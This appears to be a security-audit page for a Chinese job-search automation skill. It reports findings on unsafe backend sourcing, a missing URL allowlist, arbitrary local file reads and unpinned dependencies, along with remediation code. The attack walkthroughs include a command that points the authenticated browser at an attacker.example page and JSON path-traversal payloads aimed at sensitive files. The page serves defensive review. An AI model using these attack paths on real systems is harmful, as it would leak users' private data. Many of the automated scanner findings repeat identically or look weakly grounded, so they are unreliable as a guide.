Back to skill

Security audit

BOSS直聘仿人求职助手

Security checks for vulnerabilities and agentic risk

Overview

The skill has a coherent job-search purpose, but it needs Review because it can drive an authenticated browser to unvalidated URLs and can load backend shell code from environment-selected paths.

Review before installing. Use only trusted local copies of agent-browser-runtime, set BZC_BACKEND=brs, avoid overriding BRS_JS or BZC_BACKEND from untrusted environments, and only run process_job.sh on verified https://www.zhipin.com/job_detail/... URLs. Do not grant AUTHORIZED=1 unless you have reviewed the exact job URL and message text.

Vulnerability Patterns
  • Tool Hijacking and SpoofingModifies or replaces tools so legitimate-looking calls execute attacker logic
  • Insecure DependenciesIntroduces malicious components through unsafe dependency sources
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
Findings (4)

T07 · Tool Hijacking and Spoofing

Error
Location
scripts/common.sh:88
Finding

Environment-Controlled Backend Loading Allows Policy Bypass and Arbitrary Shell Sourcing

Content
View full analysis
Remediation
View remediation
&2 exit 1 ;; esac ``` Additional hardening should include: 1. Remove operational deprecated backends from the distributed package. 2. Reject values containing `/`, `\`, `..`, control characters, or whitespace. 3. If multiple backends are supported later, map fixed identifiers to fixed canonical paths instead of interpolating identifiers into paths. 4. Resolve and verify the canonical path before sourcing it. 5. Require the canonical path to be a direct child of the backend directory. 6. Consider running third-party backend adapters in isolated subprocesses rather than sourcing them into the main shell. 7. Add regression tests for `_deprecated/codex`, `../`, absolute paths, and encoded or repeated path separators. ]]>

T09 · Insecure Skill Coding Practices

Error
Location
scripts/process_job.sh:53
Finding

Missing URL Allowlist Permits Authenticated Browser Actions on Untrusted Origins

Content
View full analysis
/dev/null || { exit 1; } fi ``` ```bash bz_ui "$TAB" click --selector ".btn-startchat" 2>&1 || true if ! bz_ui "$TAB" click --selector "#chat-input" >/dev/null 2>&1; then bz_ui "$TAB" click --selector "textarea.input-area" 2>&1 || true fi bz_ui "$TAB" type --text "$TEXT" 2>&1 if ! bz_ui "$TAB" click --selector ".btn-send" >/dev/null 2>&1; then bz_ui "$TAB" click --selector ".send-message" 2>&1 || true fi ``` ### Technical Analysis The `--url` argument is only checked for emptiness. The script does not validate: - The URL scheme. - The hostname. - The destination port. - The expected BOSS Zhipin job-detail path. - Whether navigation or redirects remain on an approved origin. The project is declared to process BOSS Zhipin job URLs, but the script will navigate its persistent browser session to any supplied URL. After navigation, it searches for generic CSS selectors and may click elements, type the complete message text, and click a send-like button. An attacker-controlled web page can deliberately expose matching selectors such as `.btn-startchat`, `#chat-input`, and `.btn-send`. With an authorized send invocation, the script could then disclose the local message content to that page or trigger unintended page actions. ### Attack Path 1. An attacker supplies a malicious non-Zhipin URL through `--url`. 2. The user or orchestration layer invokes an authorized operation, for example: ```bash AUTHORIZED=1 bash scripts/process_job.sh \ --url "https://attacker.example/fake-job" \ --send ...[truncated 1300 chars]
Remediation
View remediation
.html ``` 6. Strip or reject unnecessary query parameters and fragments. 7. After navigation, retrieve and validate the final URL before any click, type, bookmark, or send operation. 8. Abort if a redirect leaves the approved origin. 9. Validate the final page structure and job identifier before entering message text. 10. Add tests for attacker-controlled domains, subdomain confusion, user-information syntax, alternate ports, protocol-relative URLs, and cross-origin redirects. A Python validation helper can provide robust parsing: ```python from urllib.parse import urlsplit import re u = urlsplit(candidate) if u.scheme != "https": raise ValueError("HTTPS is required") if u.hostname != "www.zhipin.com": raise ValueError("Unapproved host") if u.port not in (None, 443): raise ValueError("Unapproved port") if not re.fullmatch(r"/job_detail/[A-Za-z0-9_-]+\.html", u.path): raise ValueError("Unexpected job path") ``` ]]>

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/backends/brs.sh:72
Finding

Untrusted Browser Artifact Path Allows Arbitrary Local File Reads

Content
View full analysis
&1) || { echo "$out"; return 1; } p=$(printf '%s' "$out" | "$PYTHON" -c 'import sys,json try: j=json.loads(sys.stdin.read()); print(j.get("path") or j.get("artifact",{}).get("path") or "") except Exception: print("")') || true if [ -n "$p" ]; then root="$(cd "$(dirname "$BRS_JS")/.." && pwd)" if [ -f "$root/$p" ]; then cat "$root/$p"; return 0; fi [ -f "$p" ] && { cat "$p"; return 0; } return 1 fi printf '%s' "$out" } ``` ### Technical Analysis The browser runtime returns a JSON artifact path, which is accepted without path validation. The function then attempts to read both: ```text / ``` and: ```text ``` The implementation does not reject absolute paths or `..` traversal components. It also does not canonicalize the candidate and verify that it remains under a designated artifact directory. The second fallback, `[ -f "$p" ] && cat "$p"`, explicitly permits any existing path accessible to the current user. Therefore, a compromised, spoofed, or maliciously configured browser runtime can cause the Skill to read arbitrary local files. The file contents are returned as though they were browser HTML. Calling scripts may parse the content or write it into working files such as search HTML snapshots or verification artifacts. ### Attack Path 1. An attacker controls or compromises the configured `brs.js` runtime, or substitutes it through the supported `BRS_JS` environment variable. 2. The malicious runtime responds to `browse-html` with JSON such as: ```json {"path":"/home/user/sensitive-file"} ``` or: ```json {"path":"../../../../home/user/sensitive-file"} `` ...[truncated 868 chars]
Remediation
View remediation
&2; return 1 ;; esac [ -f "$candidate" ] || return 1 [ ! -L "$candidate" ] || return 1 cat -- "$candidate" ``` Where available, use `openat`-style APIs or a Python helper that opens files relative to a trusted directory and verifies the resolved path before reading. ]]>

T08 · Insecure Dependencies

Warning
Location
requirements.txt:1
Finding

Unpinned Executed Dependencies Create a Non-Reproducible Supply-Chain Boundary

Content
View full analysis
=6.0 ``` The documented workflow also requires installation of the external `agent-browser-runtime` project but does not identify an immutable reviewed commit, signed release, or expected checksum. ### Technical Analysis The Python dependency uses an open-ended lower bound. A future installation can therefore resolve to a later release that was not present during this audit. The dependency file also lacks hashes, preventing installers from verifying that the downloaded artifact is the exact artifact reviewed by maintainers. The external browser runtime is a particularly sensitive dependency because it: - Executes Node.js code locally. - Controls a persistent authenticated browser. - Returns filesystem artifact paths consumed by this Skill. - Performs browser extraction and user-interface operations. The installation guidance identifies the upstream GitHub repository but does not pin an immutable release or commit. A later upstream change or repository compromise could therefore alter the effective code executed by users without any change to this Skill package. This is a supply-chain hardening weakness. The audit did not find evidence that PyYAML or the named browser-runtime project is currently malicious. ### Attack Path 1. A future dependency release, package-distribution account, repository branch, or upstream source is compromised. 2. A user follows the documented installation process at a later date. 3. `pip` resolves `pyyaml>=6.0` to a newer unaudited release, or the user clones the current moving state of the browser-runtime repository. 4. The changed dependency executes in the local Python or Node.js environment. 5. The compromised component gains the privileges available to that process, including ...[truncated 731 chars]
Remediation
View remediation
``` 2. Generate and verify cryptographic hashes using a lock-file workflow. 3. Install with hash enforcement, such as: ```bash python -m pip install --require-hashes -r requirements.lock ``` 4. Use a controlled package index or explicitly configure approved indexes. 5. Run dependency vulnerability and provenance checks in continuous integration. 6. Periodically update pins through a reviewed dependency-update process. For the browser runtime: 1. Pin an immutable Git commit or signed release tag. 2. Publish the expected commit identifier and artifact checksum in the documentation. 3. Verify release signatures or checksums before execution. 4. Avoid automatically tracking the upstream default branch. 5. Vendor or lock the runtime's transitive Node.js dependencies. 6. Run the runtime with reduced filesystem and network privileges where practical. 7. Separate the browser runtime from sensitive host files using container or operating-system sandboxing. 8. Document the runtime as a high-trust component because it controls an authenticated browser. ]]>
Vulnerability Patterns
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Tool MisuseTool Parameter Abuse, Chaining Abuse, Unsafe Defaults
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Findings (46)

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · .gitignore (reported line 20)May include surrounding context.

text
# ===== agent-browser-runtime 运行时(相邻部署,不混入本仓库)=====
data/
artifacts/
.env
runtime/profile/

# ===== Python 虚拟环境 =====

Tp4

High
Category
MCP Tool Poisoning
Confidence
97% confidence
Finding

The document exposes a generic script runner pattern (bash scripts/run_py.sh ...) and references environment/path abstraction for invoking Python. In a skill context, a generic runner can become dangerous if higher-level orchestration allows user-controlled script names or arguments, because it expands the effective execution surface beyond the narrowly declared job-application tasks.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
98% confidence
Finding

The document exposes a generic script runner pattern (bash scripts/run_py.sh ...) and references environment/path abstraction for invoking Python. In a skill context, a generic runner can become dangerous if higher-level orchestration allows user-controlled script names or arguments, because it expands the effective execution surface beyond the narrowly declared job-application tasks.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
97% confidence
Finding

The document exposes a generic script runner pattern (bash scripts/run_py.sh ...) and references environment/path abstraction for invoking Python. In a skill context, a generic runner can become dangerous if higher-level orchestration allows user-controlled script names or arguments, because it expands the effective execution surface beyond the narrowly declared job-application tasks.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
99% confidence
Finding

The document exposes a generic script runner pattern (bash scripts/run_py.sh ...) and references environment/path abstraction for invoking Python. In a skill context, a generic runner can become dangerous if higher-level orchestration allows user-controlled script names or arguments, because it expands the effective execution surface beyond the narrowly declared job-application tasks.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
96% confidence
Finding

The document exposes a generic script runner pattern (bash scripts/run_py.sh ...) and references environment/path abstraction for invoking Python. In a skill context, a generic runner can become dangerous if higher-level orchestration allows user-controlled script names or arguments, because it expands the effective execution surface beyond the narrowly declared job-application tasks.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
97% confidence
Finding

The document exposes a generic script runner pattern (bash scripts/run_py.sh ...) and references environment/path abstraction for invoking Python. In a skill context, a generic runner can become dangerous if higher-level orchestration allows user-controlled script names or arguments, because it expands the effective execution surface beyond the narrowly declared job-application tasks.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
96% confidence
Finding

The document exposes a generic script runner pattern (bash scripts/run_py.sh ...) and references environment/path abstraction for invoking Python. In a skill context, a generic runner can become dangerous if higher-level orchestration allows user-controlled script names or arguments, because it expands the effective execution surface beyond the narrowly declared job-application tasks.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
98% confidence
Finding

The document exposes a generic script runner pattern (bash scripts/run_py.sh ...) and references environment/path abstraction for invoking Python. In a skill context, a generic runner can become dangerous if higher-level orchestration allows user-controlled script names or arguments, because it expands the effective execution surface beyond the narrowly declared job-application tasks.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
95% confidence
Finding

The document exposes a generic script runner pattern (bash scripts/run_py.sh ...) and references environment/path abstraction for invoking Python. In a skill context, a generic runner can become dangerous if higher-level orchestration allows user-controlled script names or arguments, because it expands the effective execution surface beyond the narrowly declared job-application tasks.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
91% confidence
Finding

The document exposes a generic script runner pattern (bash scripts/run_py.sh ...) and references environment/path abstraction for invoking Python. In a skill context, a generic runner can become dangerous if higher-level orchestration allows user-controlled script names or arguments, because it expands the effective execution surface beyond the narrowly declared job-application tasks.

Content

No source excerpt is available for this finding.

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 38)May include surrounding context.

md
## 安全纪律(灵魂 · 全文见 references/safety_rules.md)

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 96)May include surrounding context.

md
## 安全纪律(灵魂 · 全文见 references/safety_rules.md)

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 110)May include surrounding context.

md
## 安全纪律(灵魂 · 全文见 references/safety_rules.md)

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 112)May include surrounding context.

md
## 安全纪律(灵魂 · 全文见 references/safety_rules.md)

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 181)May include surrounding context.

md
## 安全纪律(灵魂 · 全文见 references/safety_rules.md)

Chaining Abuse

High
Category
Tool Misuse
Confidence
75% confidence
Finding

Tool calls are chained to bypass individual safety checks or escalate capabilities beyond what any single tool call would allow.

Content

Scanner excerpt · scripts/process_job.sh (reported line 117)May include surrounding context.

sh
PARSED="${WORK_DIR:-.work}/.parse_job.tmp"; mkdir -p "$(dirname "$PARSED")"
  # 用稳健的 DOM 解析(parse_job.py)替换脆弱正则;HTML 经 stdin 传入
  "$PYTHON" "$SCRIPT_DIR_W/parse_job.py" --url "$URL" >"$PARSED" <<<"$HTML" \
    || { echo "FAIL_LOUD: parse_job.py 解析 JD 失败" >&2; rm -f "$PARSED"; exit 1; }
  # 单 dict 包成单元素列表写入(满足 audit_icebreaker.py 的「列表」契约,见 C1)
  "$PYTHON" - "$OUT_JSON" "$PARSED" <<'PY'
import sys, json

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
95% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · scripts/search_jobs.sh (reported line 109)May include surrounding context.

sh
fail_loud_if_down
WORK="${WORK_DIR:-.work}"; mkdir -p "$WORK" "$(dirname "$OUT")"
rm -f "$WORK"/_search_*.json "$WORK"/_search_*.html || true   # safe-delete 拦截 rm 时忽略失败(恢复 -f 语义)

# ---- 开一个 tab 全程复用(R8 单 lease 连续 tab;禁频繁开关)----
bz_browse_start "$JOB_URL" enhanced || { echo "FAIL_LOUD: browse-start 失败" >&2; exit 1; }

Undeclared Tool Scope

Medium
Category
MCP Least Privilege
Confidence
70% confidence
Finding

Without declared permissions the skill's intent is opaque and cannot be validated.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The entire skill description and all user-facing instructions are written only in Chinese, and there is no statement that the user may choose another language or locale. Under the policy, forcing a specific language without user opt-in is a natural-language policy violation unless the locale constraint is explicitly documented and justified.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
86% confidence
Finding

The file’s natural-language content and search criteria are entirely Chinese-language and Beijing-specific, which effectively constrains the skill to a single language/locale context. The file does not indicate that this is optional, user-selectable, or justified as a region-specific mode, so it can conflict with organizational language/locale choice expectations.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
84% confidence
Finding

The heading explicitly fixes the skill documentation and operation context to Chinese-language usage without indicating any user choice or opt-in. Under the policy, forcing a specific language or locale is a natural-language policy violation unless the constraint is documented as an intentional region-specific requirement.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
82% confidence
Finding

The schema, examples, and field guidance are entirely presented in Chinese, including the example values for goal, city, and search queries, with no indication that other languages/locales are supported. This can amount to a language/locale policy issue if the skill implicitly forces Chinese output or interaction without explicit user opt-in or a documented region-specific justification.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
86% confidence
Finding

This file is entirely written as mandatory operating instructions in Chinese and states that all browser actions must obey these rules, but it does not provide any opt-in, alternative locale, or justification that the skill is limited to Chinese-speaking users only. Under the language/locale policy rule, forcing a specific language without user choice is a natural-language policy concern.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
97% confidence
Finding

This is a code file, so natural-language policy checks apply to its docstring and emitted messages. The file presents all usage guidance and operational requirements only in Chinese, which imposes a specific language on users without any opt-in or documented locale justification.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.